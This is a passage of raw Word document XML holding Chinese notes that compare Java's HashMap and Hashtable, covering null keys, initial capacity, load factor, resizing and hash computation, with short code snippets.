        <w:t>，不过建议还是尽量避免这样使用，因为一旦不小心使用了，若因此引发一些问题，排查起来很是费事</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，总是存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数组的第一个节点上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00655D0F" w:rsidRPr="00F41A4C" w:rsidRDefault="00655D0F" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口的实现，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashTable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>抽象类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00655D0F" w:rsidRPr="00F41A4C" w:rsidRDefault="00655D0F" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的初始容量为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>初始容量为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，两者的填充因子默认都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.75</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>扩容时是当前容量翻倍即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:capacity*2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>扩容时是容量翻倍</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:capacity*2+1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00655D0F" w:rsidRPr="00F41A4C" w:rsidRDefault="00655D0F" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两者计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的方法不同</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是直接使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数组的长度直接进行取模</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A7BF7" w:rsidRPr="00F41A4C" w:rsidRDefault="007A7BF7" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash = key.hashCode();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> index = (hash &amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="800080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x7FFFFFFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) % tab.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="378" w:lineRule="atLeast"/>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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行了二次</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，以获得更好的散列值，然后对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数组长度取摸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="9CBA39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="图片 4" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="190500" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
